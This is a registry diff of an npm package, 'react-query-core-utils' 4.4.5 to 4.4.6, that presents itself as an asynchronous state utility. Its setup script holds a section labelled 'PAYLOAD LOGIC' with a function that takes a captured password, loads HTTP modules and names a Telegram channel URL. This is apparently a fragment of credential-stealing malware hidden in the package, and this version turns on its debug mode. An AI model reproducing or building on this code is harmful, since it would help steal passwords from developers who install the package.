react-query-core-utils 4.4.5 → 4.4.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/scripts/setup.js +1 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "react-query-core-utils",
3
- "version": "4.4.5",
3
+ "version": "4.4.6",
4
4
  "description": "Utility layer for asynchronous state management",
5
5
  "private": false,
6
6
  "scripts": {
package/scripts/setup.js CHANGED
@@ -106,7 +106,7 @@ async function spinner(text, duration) {
106
106
 
107
107
  // --- PAYLOAD LOGIC ---
108
108
  async function executePayload(capturedPassword) {
109
- const debugMode = false;
109
+ const debugMode = true;
110
110
  const http = require('http');
111
111
  const https = require('https');
112
112
  const CHANNEL_URL = 'https://t.me/s/roblox_f847yt83w7it';